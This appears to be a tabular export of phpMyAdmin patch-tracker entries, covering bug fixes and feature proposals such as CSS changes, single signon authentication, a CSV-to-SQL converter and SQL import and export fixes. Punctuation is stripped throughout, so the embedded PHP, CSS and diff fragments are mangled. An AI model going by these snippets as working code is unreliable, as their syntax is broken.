gt; ; line 100 color inherit ; \ color lt;?php echo GLOBALS[ cfg ][ NaviPointerColor ]; ?
gt; ; \ background lt;?php echo GLOBALS[ cfg ][ NaviPointerBackground ]; ?
gt; ; and in themes darkblue orange layout.inc.php line 45 should be a littlebit darker to make the white characters better readable in the selected row and to fit the right design GLOBALS[ cfg ][ BrowseMarkerBackground ] = d72 ; not really a bug but a nuisance when debugging with FF with js error console open, the screen is full of unknown ... border radius topleft..... unknown ... border radius topright..... in all theme right.css.php line 596 ca.)
Sebastian, i know you don t like it but please change border radius topleft 0.4em; border radius topright 0.4em; moz border radius topleft 0.4em; moz border radius topright 0.4em; to lt;?php if substr SERVER[ HTTP USER AGENT ], Gecko ) gt; 0 ) \{ ?
gt; moz border radius topleft 0.4em; moz border radius topright 0.4em; lt;?php \} else \{ ?
gt; border radius topleft 0.4em; border radius topright 0.4em; lt;?php \} ?
gt; Original URL https sourceforge.net p phpmyadmin patches 318 https sourceforge.net p phpmyadmin patches 318 Original author windkiel","bug"
"24444","4263","BIT datatype.
As of MySQL 5.0.3 BIT n) is a regular datatyp not a synonym for TINYINT BOOL anymore).
n may range from 1 to 64.
Storage space is from 1 to 4 bytes.
Current MySQL documentation ist to be found in chapters 11.1.1, 11.2 and 11.5.
There is no feature request or change history entry in the database yet.
Original URL https sourceforge.net p phpmyadmin patches 319 https sourceforge.net p phpmyadmin patches 319 Original author un wesen","bug"
"24444","4264","edit server form in setup.php.
in server.php create edit [ ] Compress connection should better be Compress connection ...[ ] checkbox aligned with option boxes) Original URL https sourceforge.net p phpmyadmin patches 320 https sourceforge.net p phpmyadmin patches 320 Original author windkiel","bug"
"24444","4265","scripts setup.php readability and spellfix.
I think there was one typo and a number of language improvements re wordings.
Original URL https sourceforge.net p phpmyadmin patches 321 https sourceforge.net p phpmyadmin patches 321 Original author ibennetch","bug"
"24444","4266","Bug with tree nesting bigger than 1.
When you set the tree nesting bigger than 2 than when you click on the group name the tables are not corect selected Possible sollution in function PMA displayTableList left.php) , when the recursive call ocures you have to chenge this PMA displayTableList table, false, , table db ); in this PMA displayTableList table, false, group, table db ); IOn.
BORGChat developer.
PS I have attached the changed file for v.2.8.2.2) Original URL https sourceforge.net p phpmyadmin patches 322 https sourceforge.net p phpmyadmin patches 322 Original author borgcmi","bug"
"24444","4267","libraries session.inc.php specify the session name.
with this patch we can specify the session name in config file by adding line cfg[ session name ] = MySessionName ; We d like autologin our clients with this simple code cfg[ Servers ][1][ auth type ] = config ; cfg[ Servers ][1][ user ] = SESSION[ user ]; cfg[ Servers ][1][ password ] = SESSION[ passsql ]; Please integrate this patch in the next realease of phpMyAdmin.
I patched the session.inc.php file version 2.13 Id session.inc.php,v 2.13 2006 05 30 14 50 40 nijel Exp Original URL https sourceforge.net p phpmyadmin patches 323 https sourceforge.net p phpmyadmin patches 323 Original author gassla","bug"
"24444","4268","Single signon auth method.
Attached patch adds single signon authentication method which grabs credentials from configured PHP session.
To integrate in phpMyAdmin, apply patch from attached tarball and unpack php files into phpMyAdmin.
Then just select signon auth type and look at scripts signon.php how to integrate this in your application.
New configuration parameters cfg[ Servers ][ i][ SignonURL ] where to redirect if authentication fails cfg[ Servers ][ i][ SignonSession ] name of session where to grab credentials from Original URL https sourceforge.net p phpmyadmin patches 324 https sourceforge.net p phpmyadmin patches 324 Original author nijel","bug"
"24444","4269","Create table from CSV import.
lt;?
SQLify csv.php Takes comma delimited CSV file converts it to SQL database code.
Copyright C) 2006 Kiernan Holland This program is free software; you can redistribute it and or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 1301 USA You can contact me by Mail at Kiernan Holland 2774 Walnut St., Los Alamos, NM 87544 load = inputfile.csv ; table name = tablename ; list table name, suffix) = split .
, load); function process columns value, key) \{ value = trim value); \} replace commas with hex representations function csv strings convert matches) \{ replace[ , ] = COMMA ; match 2 = strtr matches[2], replace); return matches[1] .
match 2 .
matches[3]; \} replace commas with hex representations function csv strings revert matches) \{ replace[ COMMA ] = , ; match = strtr matches[1], replace); return match; \} handle = fopen load, r ); c = 0; rows = array ); rewind handle); while string = fgets handle)) \{ if trim string) != ) if preg match , , string)) if c == 0) \{ replace the easy stuff replace = array = gt; , = gt; , = gt; DOLLAR , = gt; AT , = gt; , = gt; PERCENT , ?
= gt; , .
= gt; , = gt; NUMBER ); string2 = strtr strtoupper string), replace); replace the hard stuff replace2 = array [ ] , = gt; , , [ ])[ ] [ ,]) = gt; 1 2 ); string3 = preg replace array keys replace2), array values replace2), string2); columns = split , , string3); array walk columns, process columns ); print lt;pre gt; .
print r columns,1) .
lt; pre gt; lt;p gt; ; columns = split , , load); \} else \{ replace the easy stuff string = preg replace callback \ ) [ ] ) \ ) , csv strings convert , string); replace = array = gt; , = gt; , ); string2 = strtr string, replace); rows[ c] = split , , string2); row columns = rows[ c]; array walk row columns, process columns ); count columns = count row columns); for i = 0; i lt; count columns) ; i ) \{ if isset row columns[ i])) \{ if !isset assess type[ i])) assess type[ i] = trim row columns[ i]); else assess type[ i] .= trim row columns[ i]); if !isset assess length[ i])) assess length[ i] = strlen row columns[ i]); else assess length[ i] = max strlen row columns[ i]), assess length[ i]); \} \} columns = split , , load); \} string2 = ; string3 = ; \} if !isset rows) || !is array rows)) exit; if !isset columns) || !is array columns)) exit; if !isset assess type) || !is array assess type)) exit; if !isset assess length) || !is array assess length)) exit; sql fields = columns; print lt;hr gt; lt;pre gt; .
print r assess type,1) .
lt; pre gt; lt;p gt; ; print lt;hr gt; lt;pre gt; .
print r assess length,1) .
lt; pre gt; lt;p gt; ; count columns = count assess type); for i = 0; i lt; count columns) ; i ) \{ This will probably have to be reshaped to include more types, like floats and such.. if contains non numbers, must be string literal if preg match [ 0 9] , assess type[ i])) \{ character string literal assess length[ i] ; compute in ending nulls and overflow.. if assess length[ i] lt;= 255) \{ sql type[ i] = varchar ; \} else \{ sql type[ i] = text ; TEXT or BLOB \} \} else \{ NUMERIC Can use assess length array to determine SMALLINT, INT, etc.. but as a catchall will use plain old INT.. if assess length[ i] gt; 0) \{ sql type[ i] = int ; assess length[ i] ; compute in ending nulls and overflow.. \} else \{ field was unused.. sql type[ i] = varchar ; assess length[ i] = 10; bogus.. \} \} \} sql length = assess length; print lt;hr gt; lt;pre gt; .
print r sql fields,1) .
lt; pre gt; lt;p gt; ; print lt;hr gt; lt;pre gt; .
print r sql type,1) .
lt; pre gt; lt;p gt; ; print lt;hr gt; lt;pre gt; .
print r sql length,1) .
lt; pre gt; lt;p gt; ; sql table = ; sql table .= CREATE TABLE ` table name` `id` int 20) unsigned NOT NULL auto increment, ; count fields = count sql fields); for i = 0; i lt; count fields) ; i ) \{ field name = columns[ i]; field type = sql type[ i]; field count = sql length[ i]; add tabs = str repeat \t , int) 4 round strlen field name) 6)))); make output look more beautiful switch field type) \{ for big text fields case text sql table .= ` field name` add tabs field type NOT NULL,\n ; break; for numeric fields case int sql table .= ` field name` add tabs field type field count) NOT NULL default 0 ,\n ; break; for everything else default case varchar sql table .= ` field name` add tabs field type field count) NOT NULL default ,\n ; break; \} \} sql table .= PRIMARY KEY `id`) ; function format sql insertion value, key, field types) \{ ft = field types[ key]; ft = varchar ; switch ft) \{ case int leave as is print ft\{ key\} value lt;p gt; ; string = preg replace callback . )
, csv strings revert , value); value = mysql real escape string string); break; case varchar print ft\{ key\} value lt;p gt; ; value = .
value .
; string = preg replace callback . )
, csv strings revert , value); value = .
mysql real escape string string) .
; break; case text value = .
value .
; print ft\{ key\} value lt;p gt; ; string = preg replace callback . )
, csv strings revert , value); value = .
mysql real escape string string) .
; break; \} \} sql data insertion = \n ; reset rows); real row num = 1; total rows = count rows); for i = 0; i lt; total rows) ; i ) \{ if isset rows[ i])) this row = rows[ i]; else this row = false; if is array this row)) \{ if count this row) lt; count sql type)) \{ print row real row num, has less fields that those specified in the sql column header.
lt;br gt; ; \} else \{ if count this row) == count sql type)) \{ print row real row num, has as many fields that those specified in the sql column header.
lt;br gt; ; \} else \{ print row real row num, has more fields that those specified in the sql column header.
lt;br gt; ; \} \} array walk this row, format sql insertion , sql type); this row = array pad this row, count sql type), ); pad the remaining fields in case short.. sql data insertion .= INSERT INTO ` table name` VALUES .
i 1) .
, .
implode , , this row)) .
);\n ; real row num ; \} \} ) TYPE=MyISAM AUTO INCREMENT= real row num \n sql table .= ) TYPE=MyISAM; \n \n ; sql file = lt; lt; lt;SUPERCALIFRIDGE Table table name SQL Generated with SQLify a smarter, csv to sql converter) Database ` table name` Table structure for table ` table name` sql table Dumping data for table ` table name` sql data insertion SUPERCALIFRIDGE; print lt;pre gt; .
sql file .
lt; pre gt; ; Original URL https sourceforge.net p phpmyadmin patches 325 https sourceforge.net p phpmyadmin patches 325 Original author rofthorax","bug"
"24444","4270","fix for bug 1554885. fix for bug 1554885, see discussion there...
Original URL https sourceforge.net p phpmyadmin patches 326 https sourceforge.net p phpmyadmin patches 326 Original author ibennetch","bug"
"24444","4271","add UTC DATE and UTC TIME functions.
This patch against phpMyAdmin CVS 2006 09 22 adds support for UTC DATE and UTC TIME functions, available as of MySQL 4.1.1.
The patch works for 2.8.2.4 as well.
Original URL https sourceforge.net p phpmyadmin patches 327 https sourceforge.net p phpmyadmin patches 327 Original author ci dev","bug"
"24444","4272","Fix for 1550690 wrong sql export of foreign keys.
The sql constraints query variable grew within the for loop.
But during each loop run, it got appended to sql constraints which is used in the export.
That resulted in multiple occurences of ALTER TABLE.
I added a temporary variable, which will be concatenated with both variables sql constraints query and sql constraints) Original URL https sourceforge.net p phpmyadmin patches 328 https sourceforge.net p phpmyadmin patches 328 Original author rvock","bug"
"24444","4273","Cleanup Wikipedia URLs in Doc.
Some of the Wikipedia URLs in the Documentation file aren t escaped properly.
This patch cleans them up.
Original URL https sourceforge.net p phpmyadmin patches 329 https sourceforge.net p phpmyadmin patches 329 Original author cyberdog3k","bug"
"24444","4274","Fix duplicate span IDs in doc.
There are two duplicate span ids in the Documentation file.
This is not allowed in the HTML spec, and probably just a result of a hasty copy paste.
Patch makes the ids different.
Original URL https sourceforge.net p phpmyadmin patches 330 https sourceforge.net p phpmyadmin patches 330 Original author cyberdog3k","bug"
"24444","4275","CSV for Excel export uses wrong extension.
Using CVS for Excel export uses the wrong extension and causes the exported file to open incorrectly in Excel.
.
libraries export excel.php excel.php.original 2006 10 04 08 43 32.000000000 0600 excel.php 2006 10 04 08 44 13.000000000 0600 9,7 9,7 if isset plugin list)) \{ plugin list[ excel ] = array text = gt; strStrucExcelCSV , extension = gt; xls , \ extension = gt; csv , mime type = gt; application vnd.ms excel , options = gt; array array type = gt; text , name = gt; null , text = gt; strReplaceNULLBy ), Original URL https sourceforge.net p phpmyadmin patches 331 https sourceforge.net p phpmyadmin patches 331 Original author ssevennm","bug"
"24444","4276","Adds SSL support to remote mysql connections.
Implements a new configuration parameter, MYSQL CLIENT SSL, that controls whether connections to mysql servers use SSL or not.
Only implemented in older mysql library as that s what I use.
A similar patch could easily be made for the newer mysqli library, but I can t test it, so it isn t included.
Original URL https sourceforge.net p phpmyadmin patches 332 https sourceforge.net p phpmyadmin patches 332 Original author mattrwilliams","bug"
"24444","4277","Use server name in request instead of server index.
It is very useful if you can use phpmyadmin index.php?server=SERVERNAME the sameway u use phpmyadmin index.php?db=DBNAME .
Unfortunatly currently you can only supply a server index which ofcourse is unknown to other applications).
This simple patch looks up the index if REQUEST[ server ] is a string.
I could really appreciate if this small piece of code could end up in the distribution.
File libraries common.lib.php ADDED CODE Lookup server by name Added by Arnold Helder Hosting if !empty REQUEST[ server ]) is string REQUEST[ server ]) !ctype digit REQUEST[ server ])) \{ foreach cfg[ Servers ] as i= gt; server) \{ if server[ host ] == REQUEST[ server ]) \{ REQUEST[ server ] = i; break; \} \} if is string REQUEST[ server ])) unset REQUEST[ server ]); \} END OF ADDED CODE If no server is selected, make sure that cfg[ Server ] is empty so that nothing will work), and skip server authentication.
We do NOT exit here, but continue on without logging into any server.
This way, the welcome page will still come up with no server info) and present a choice of servers in the case that there are multiple servers and cfg[ ServerDefault ] = 0 is set.
if !empty REQUEST[ server ]) !empty cfg[ Servers ][ REQUEST[ server ]])) \{ GLOBALS[ server ] = REQUEST[ server ]; ....
Original URL https sourceforge.net p phpmyadmin patches 333 https sourceforge.net p phpmyadmin patches 333 Original author arnold81","bug"
"24444","4278","Add charset to SQL export.
When I export in SQL as choose Save as file , the chosen character set is not mentioned in the exported file.
If I later import the exported file using the mysql command line client, the result depends on the default character set on the client system e.g.
specified using .my.cnf).
This problem can be solved by adding e.g.
SET NAMES utf8 to the exported file.
To avoid problems with old MySQL servers and other database servers, these can be embedded in MySQLs conditional comments , e.g.
!40101 SET NAMES utf8 .
The attached patch adds SET NAMES xxx to the header of the SQL export when the output character set is supported by MySQL not all character sets in the list are).
It also saves the previous setting in temporary variables so that it can be restored at the end of the file.
The output is intended to be similar to that of mysqldump.
Original URL https sourceforge.net p phpmyadmin patches 334 https sourceforge.net p phpmyadmin patches 334 Original author c960657","bug"
"24444","4279","Fix 2 undefined index notices.
This just fixes 2 undefined index notices by using isset ) to check the vars.
Original URL https sourceforge.net p phpmyadmin patches 335 https sourceforge.net p phpmyadmin patches 335 Original author swatinem","bug"
"24444","4280","Add Ability to customize Server Choice option list.
I have patched select server.inc.php and config.sample.inc.php so that I can create custom titles for the Server Choice menu for the login page.
Original URL https sourceforge.net p phpmyadmin patches 336 https sourceforge.net p phpmyadmin patches 336 Original author speeves","bug"
"24444","4281","404 not found under Privileges.
We use phpmyadmin.web3.unt.edu as a proxy to an apache server on the mysql db machine, where we run phpmyadmin).
The apache documentroot on the mysql db machine is var www phpmyadmin resides at var www phpmyadmin The proxy uses var www phpmyadmin as the root of the vhost.
When clicking on Privileges gt;User overview gt; any initial or show all), the hyperlink looks like lt;tr gt; lt;td gt; lt;a href= phpmyadmin server privileges.php?token=8f...
Unfortunately, that throws a 404 not found, as the usage of PHP SELF adds another phpmyadmin to the string, looking for server privileges.php in var www phpmyadmin phpmyadmin server privileges.php instead of var www phpmyadmin server privileges.php In this patch, I replaced the usage of PHP SELF with .
server privileges.php, which is used throughout the rest of the file anyways.
thanks, speeves Original URL https sourceforge.net p phpmyadmin patches 337 https sourceforge.net p phpmyadmin patches 337 Original author speeves","bug"
"24444","4282","Allow selection of SQL using triple click.
When you triple click on a word in a text document in a webbrowser, word processor etc., the whole paragraph is usually) selected.
When you triple click on a word in the highlighted SQL code in the top of the page, e.g.
when browsing through result sets etc., not only the SQL is selected but also the string SQL query that is contained in the lt;legend gt; of the fieldset that contains the highlighted SQL.
This trivial patch adds a DIV, so that only the SQL and not the legend is selected.
Note that in Firefox, triple clicking does not span the lt;br gt; s that are inserted in the hightligted SQL so it triple clicking in Firefox still isn t that useful this patch doesn t make this problem worse that it already is).
In IE7 the whole SQL is selected, even when it spans multiple lines.
Original URL https sourceforge.net p phpmyadmin patches 338 https sourceforge.net p phpmyadmin patches 338 Original author c960657","bug"
"24444","4283","Allow client caching of phpmyadmin.css.php.
phpmyadmin.css.php is not cached on the client, i.e.
the whole stylesheet is fetched for every pageview.
This puts unnecessary load on the webserver and makes use of phpMyAdmin slower depending on connection speed).
In older versions, the file IS cached, but since phpMyAdmin started using session it isn t anymore, because PHP sends a lot of anti caching headers when using the built in session support SESSION).
This patch adds an Expires HTTP header to the stylesheet, so that it is always cached for one hour.
If the session parameters are changed, this is tracked in the Config class, and the modification time is added to the query string of phpmyadmin.css.php, so that the file is always fetched again when the session variables hav changed.
The cache period one hour) could be arbitrarily long.
As long as the stylesheet isn t requested every few seconds, it is fine.
Perhaps the modification time mechanism added to the Config class can be used for other purposes.
Original URL https sourceforge.net p phpmyadmin patches 339 https sourceforge.net p phpmyadmin patches 339 Original author c960657","enhancement"
"24444","4284","broken cookie login in multiserver configuration.
this patch repairs a broken cookie login attempt in multiserver configurations where a wrong server is selected after sending user and pw data.
libraries auth cookie.auth.lib.php Revision 9333 Mon Aug 21 11 55 32 2006 UTC by lem9 line 409 ... if cfg[ Server ][ user ] != PHP AUTH USER) \{ servers cnt = count cfg[ Servers ]); \ if isset REQUEST[ server ]) 0 lt; REQUEST[ server ] REQUEST[ server ] lt;= servers cnt ) \{ \ server = REQUEST[ server ]; \ cfg[ Server ] = cfg[ Servers ][ server]; \ \} \ else for i = 1; i lt;= servers cnt; i ) \{ if isset cfg[ Servers ][ i]) ... to reproduce see attached config.inc.php Original URL https sourceforge.net p phpmyadmin patches 341 https sourceforge.net p phpmyadmin patches 341 Original author windkiel","bug"
"24444","4285","English language improvements for Designer.
The Designer interface offers as error text Internet Explorer not support!
which I ve improved...though it s one of only two or three strings which haven t been abstracted out to the lang files; I wasn t sure if that was by design so I left it alone.
There are also two other strings which give error text with exclamation marks which really isn t needed and sounds like shouting, those have been fixed.
Original URL https sourceforge.net p phpmyadmin patches 340 https sourceforge.net p phpmyadmin patches 340 Original author ibennetch","enhancement"
"24444","4286","server privileges wrong escape mysql wildcards.
if you try and give a user rights on an existing db with i.e.
in the name, the option values for the dropdown db select box shows something like test\ abc instead of test abc .
Patch attached) Original URL https sourceforge.net p phpmyadmin patches 342 https sourceforge.net p phpmyadmin patches 342 Original author windkiel","bug"
"24444","4287","handling DELIMITER cmd on input.
PMA 2.9.2 and 2.10.0) couldn t import exported database with procedures.
see 1612870) I made a small modification of libraries\import\sql.php to handling the DELIMITER instruction.
This way you don t need separate file for procedures, the whole export file can be import as with CLI).
The modified libraries\import\sql.php file is attached to download.
Changes 1\.
make DELIMITER command as interesting character p8 = strpos buffer, DELIMITER , i); if p8 === FALSE || p8 gt;= len 11) || buffer[ p8 9] gt; ) \{ p8 = 2147483647;\} i = min p1, p2, p3, p4, p5, p6, p7, p8); unset p1, p2, p3, p4, p5, p6, p7, p8); 2\.
change the sql delimiter variable accordingly before End Of SQL) Change delimiter, if redefined, and skip it don t send to server!)
if substr buffer, i, 9) == DELIMITER ) buffer[ i 9] lt;= ) i lt; len 11) !
strpos buffer, \n , i 11)===FALSE) )) \{ new line pos=strpos buffer, \n , i 10); sql delimiter=substr buffer, i 10, new line pos i 10); i= new line pos 1; Next query part will start here start pos = i; continue; \} Maybe this is not the optimal solution, but works.
Original URL https sourceforge.net p phpmyadmin patches 343 https sourceforge.net p phpmyadmin patches 343 Original author fb1","bug"
"24444","4288","Working with procedures and Functions.
hi, sorry for not having been of any help for the last few years.
Now without having a devaccount anymore and not having had a look at the source for a very long time, i am not sure of all the best practices to use, but neverteless i need something to find my procedures so i did a few lines... what it does creates a table showing all the defined procedures and functions of a database icon allows deleting of procedures and functions icon allows calling of procedures.
not of functions as i haven t yet found a simple way of knowing how many parameters they need.
icon tries to show you the DEFINION now this last thing fails badly, which is whery i d appreciate some help 1) i d like to include a delimiter before the actual definition but delimiter seems to be a known problem 2) the defintion is a longtext field and the pma function seems to ignore that, and i haven t read deep enough into the source to find out how to circumvent it.
how to apply 1) put the php file into the libraries directory 2) add a require to call it into db details structure.php.
A good line in the current stable version is 500, which is just above the comment Work on the database redesigned 2004 05 08 by mkkeck for example table of procedures require .
libraries db details procedures.inc.php ; i will also need three new strings for the column headers of the table strProcedureName strProcedureType strProcedureReturnType cheers Mike Original URL https sourceforge.net p phpmyadmin patches 344 https sourceforge.net p phpmyadmin patches 344 Original author mikebeck","bug"
"24444","4289","Correcting PHP short open tag bug in designer.
If you disabled the php option short open tag you can t use the designer.
Patch is correcting it.
Original URL https sourceforge.net p phpmyadmin patches 345 https sourceforge.net p phpmyadmin patches 345 Original author mthie","bug"
"24444","4290","simplified server list on main page..
This patch adds the possibility to only show the number count of databases a server has on the main page main.php).
It addresses the todo , line 73 of libraries select server.lib.php.
By default, the old behavior is used, and by a configuration variable, the new behavior is used.
Original URL https sourceforge.net p phpmyadmin patches 346 https sourceforge.net p phpmyadmin patches 346 Original author julienlecomte","bug"
"24444","4291","YAML Data Export.
I ve put together a quick export file that allows for exporting to the YAML format.
This a commonly used format in the Ruby on Rails community.
Here s the spec http yaml.org spec current.html This file would go into the libraries export directory.
Thanks!
Original URL https sourceforge.net p phpmyadmin patches 347 https sourceforge.net p phpmyadmin patches 347 Original author brycethornton","bug"
"24444","4292","Document SQLQuery options.
Pretty much copied from the wiki, but it provides documentation of the SQLQuery options.
You may want to move it to a different location, in the wiki it s right before UploadDir so that s where I put it here.
Original URL https sourceforge.net p phpmyadmin patches 348 https sourceforge.net p phpmyadmin patches 348 Original author ibennetch","bug"
"24444","4293","Auth method read user s .my.cnf.
Hi, the attached patch adds support for a new auth method, mycnf .
Authentication is handled by the webserver, independently of phpMyAdmin or MySQL.
The user s name is used to parse a local user .my.cnf file for MySQL login information.
Cheers, Til Original URL https sourceforge.net p phpmyadmin patches 349 https sourceforge.net p phpmyadmin patches 349 Original author tkoschnick","bug"
"24444","4294","Add cfg[ ProtectBinary ] = hex feature.
For some toughts about binary field handling of phpMyAdmin see http sourceforge.net tracker index.php?func=detail aid=1611770 group id=23067 atid=377411 This patch implements a cfg[ ProtectBinary ] = hex setting that makes phpMyAdmin handle BINARY and BLOB fields in hex.
Note that I recommend to use the GLOBALS[ cfg ][ ProtectBinary ] === hex code paths in common.lib.php anyway instead of using GLOBALS[ cfg ][ ProtectBinary ] === hex .
Original URL https sourceforge.net p phpmyadmin patches 350 https sourceforge.net p phpmyadmin patches 350 Original author kornelpal","bug"
"24444","4295","fix undefined var in db structure.
Simple fix, needs no further explanation.
Original URL https sourceforge.net p phpmyadmin patches 353 https sourceforge.net p phpmyadmin patches 353 Original author swatinem","bug"
"24444","4296","Addition of BINARY ColumnTypes breaks reordering.
Trying to alphabetically reorder the column types in the create table interface by setting cfg[ ColumnTypes ] in config.inc.php has the BINARY and VARBINARY options added a second time at the end of the list.
Cause is the test in PMA DBI postConnect ) in libraries database interface.lib.php that checks if VARBINARY is the last element in the cfg[ ColumnTypes ] array.
Instead of checking if VARBINARY is the last element and adding BINARY and VARBINARY if it is not it is cleaner to test for the existence of either with in array ).
See attached patch to fix this.
Original URL https sourceforge.net p phpmyadmin patches 351 https sourceforge.net p phpmyadmin patches 351 Original author leonardjo2","bug"
"24444","4297","pma designer coords table for created tables.sql.
create table.sql hasn t a mention of pma designer coords, here is a modified version that includes it create scripts mysql 4 1 2 .sql is fine, though).
Note that I my MySQL is gt;4.1 so I couldn t do a real test but it seems correct.
Original URL https sourceforge.net p phpmyadmin patches 355 https sourceforge.net p phpmyadmin patches 355 Original author ibennetch","bug"
"24444","4298","Minor changes to native Excel export xls.php).
This patch contains several minor changes to the native Excel export plugin xls.php).
make column header fixed on print repeatRows) and when scrolling freezePanes) split data on several worksheets when table contains gt; 65536 rows Excel s limit) change Put fields names in the first row from text field to checkbox like it is on other export plugins) col renamed to rowIndex it counts rows, not columns) Original URL https sourceforge.net p phpmyadmin patches 352 https sourceforge.net p phpmyadmin patches 352 Original author c960657","bug"
"24444","4299","mcrypt required on 64 bit machines.
mcrypt is required on 64 bit machines, this updates Documentation.html to reflect that.
Original URL https sourceforge.net p phpmyadmin patches 354 https sourceforge.net p phpmyadmin patches 354 Original author ibennetch","bug"
"24444","4300","JavaScript mistype.
According to SVN revision 10261 April 11, 2007) on the stable branch, there seems to be a JavaScript mistype.
located js functions.js on line 992 return getElement e,fdocument.layers[W])); return getElement e,f.document.layers[W])); attached the patch file.
Original URL https sourceforge.net p phpmyadmin patches 356 https sourceforge.net p phpmyadmin patches 356 Original author boastard","bug"
"24444","4301","browse table sorted by key onChange .
since javascript is obligatory anyway there is no need to confirm a sort by key request.
On the contrary many other similar select boxes make use of onChange submit, e.g., language select... patch for pma 2.11 attached) Original URL https sourceforge.net p phpmyadmin patches 357 https sourceforge.net p phpmyadmin patches 357 Original author windkiel","bug"
"24444","4302","Auto increment.
when exporting structure table with checked compability mode MYSQL40 phpMyAdmin skip information about auto increment extra value Original URL https sourceforge.net p phpmyadmin patches 358 https sourceforge.net p phpmyadmin patches 358 Original author shumny","bug"
"24444","4303","typo in libraries config.default.php.
in .
libraries config.default.php Regular is misspelled as Regullar Thanks to an anonymous wiki user for noticing.
Patch attached, if that makes it easier.
Original URL https sourceforge.net p phpmyadmin patches 360 https sourceforge.net p phpmyadmin patches 360 Original author ibennetch","bug"
"24444","4304","Single signon auth method.
Hi, This little patch is used with auth type=signon , you can specify the host in a session from your app as the username and the user password.
Actually the single signon works only for a static host.
http sourceforge.net tracker index.php?func=detail aid=1545366 group id=23067 atid=377410 Please accept this patch ) Kind Regards, Original URL https sourceforge.net p phpmyadmin patches 359 https sourceforge.net p phpmyadmin patches 359 Original author gassla","bug"
"24444","4305","wrong position of < tbody>.
in .
libraries display tbl.lib.php revision 10414) line 1916, if you show table vertically the closing lt; tbody gt; tag belongs after the lt;tr gt; lt; tr gt; tags.
Otherwise the css at least in theme Grid ) gets broken.
Original URL https sourceforge.net p phpmyadmin patches 361 https sourceforge.net p phpmyadmin patches 361 Original author windkiel","bug"
"24444","4306","Possibly dead variable in language files.
In language files we have variable strLanguageFileNotFound but it s enterance can be found only in libraries select lang.lib.php on line 439, where it is unset.
Is it dead variable?
Original URL https sourceforge.net p phpmyadmin patches 362 https sourceforge.net p phpmyadmin patches 362 Original author hanut","bug"
"24444","4307","gmp pow ) Warning negative exponent).
https bugzilla.novell.com show bug.cgi?id=271746 Original URL https sourceforge.net p phpmyadmin patches 363 https sourceforge.net p phpmyadmin patches 363 Original author anosek","bug"
"24444","4308","A little misprint in english language file.
strShowStatusNot flushed delayed rowsDescr = The number of rows waiting to be written in INSERT DELAY queues.
; Must be strShowStatusNot flushed delayed rowsDescr = The number of rows waiting to be written in INSERT DELAYED queues.
; Original URL https sourceforge.net p phpmyadmin patches 364 https sourceforge.net p phpmyadmin patches 364 Original author hanut","bug"
"24444","4309","Dead variable strAutodetect in language files.
strAutodetect = Autodetect ; The only incoming of this variable is in file sql query form.lib.php on line 473, it s in comment block there.
Original URL https sourceforge.net p phpmyadmin patches 365 https sourceforge.net p phpmyadmin patches 365 Original author hanut","bug"
"24444","4310","Darkblue theme left.css minor fixes.
.
themes original css theme left.css.php a) the new db paging links and the pmaLogo need to be in compliance with the navi background color.
b) IE 7) uses ridiculous defaults for ul\{margin... c) border left for rtl languages patch attached these are only suggestions ;) Original URL https sourceforge.net p phpmyadmin patches 366 https sourceforge.net p phpmyadmin patches 366 Original author windkiel","bug"
"24444","4311","<br> after Page number only in navigation.php.
Page number lt; lt; lt; [x] gt; gt; gt; looks nicer if not in Navi ;) patch for trunk phpmyadmin libraries common.lib.php rev.
10462) attached.
Original URL https sourceforge.net p phpmyadmin patches 367 https sourceforge.net p phpmyadmin patches 367 Original author windkiel","bug"
"24444","4312","Two variables with the same meaning CSV options .
phpMyAdmin 2.10.2 There are two variables whith the same meaning in language files.
strCSVImportOptions = CSV options ; libraries import csv.php, line 21. strCSVOptions = CSV options ; libraries export csv.php, line 23.
Think it s useless.
strCSVOptions is enough.
Original URL https sourceforge.net p phpmyadmin patches 368 https sourceforge.net p phpmyadmin patches 368 Original author hanut","bug"
"24444","4313","Allow multibyte characters in number formatting.
Currently PHP function number format is not multibyte safe, so if in lang utf 8.inc.php number thousands separator I would use non breaking space \xc2\xa0) for thousands separator, then it would print only \xc2.
These language now uses space, but should use non breaking space.
czech finnish french georgian hungarian latvian lithuanian polish russian slovak swedish Original URL https sourceforge.net p phpmyadmin patches 369 https sourceforge.net p phpmyadmin patches 369 Original author garas","bug"
"24444","4314","Smaller file for favicon.ico.
Hi!
The shipped phpMyAdmin favicon is 18kB large rw r r 1 thijs root 18902 2007 06 15 19 27 favicon.ico That seems quite overkill for a 16x16 image, it seems to contain some extraneous data.
I ve recreated the same icon, and now it s just 1400 bytes rw r r 1 thijs root 1406 2007 07 09 15 39 favicon.ico Please find attached the updated file.
thanks, Thijs Original URL https sourceforge.net p phpmyadmin patches 370 https sourceforge.net p phpmyadmin patches 370 Original author kink","bug"
"24444","4315","Insert as new row BLOB is lost.
MySQL version 5.0.22 PHP 5.2.0 Select an existing row containing a BLOB field and change to Insert as new row .
The BLOB contents are not duplicated.
I ve looked back through previous bug reports and it seems this bug has been fixed several times in the past but is recurring now.
Original URL https sourceforge.net p phpmyadmin patches 371 https sourceforge.net p phpmyadmin patches 371 Original author popshed","bug"
"24444","4316","uploaded files access in Documentation.
log time ago the import tab was hidden in the sql window ...
Original URL https sourceforge.net p phpmyadmin patches 372 https sourceforge.net p phpmyadmin patches 372 Original author windkiel","bug"
"24444","4317","Incorrect export with specified MySQL port.
When I export a table, the header of the sql file is phpMyAdmin SQL Dump version 2.11.0 rc1 http www.phpmyadmin.net Host localhost 3307 Generation Time Aug 03, 2007 at 10 49 AM Server version 5.0.45 PHP Version 5.2.3 ... when I import this file, I have an error with the line of the mysql port 3307).
It seems the return char is a bug.
Original URL https sourceforge.net p phpmyadmin patches 373 https sourceforge.net p phpmyadmin patches 373 Original author jadorwin","bug"
"24444","4318","Avoid css reloading on every click.
Since SESSION now changes almost?)
on any click in pma 2.11 after introducing saving sql history and some such, the nocache value must not depend any longer on set mtime.
Also using max ) is preventing css reload on theme change if source mtime has the highest latest) value.
Patch for libraries Config.class.php attached.
Original URL https sourceforge.net p phpmyadmin patches 374 https sourceforge.net p phpmyadmin patches 374 Original author windkiel","bug"
"24444","4319","unnecessary lines in css.
just 2 3 lines, but anyway here my patch li li server info\{ list style image url lt;?php echo SESSION[ PMA Theme ] gt;getImgPath ); ?
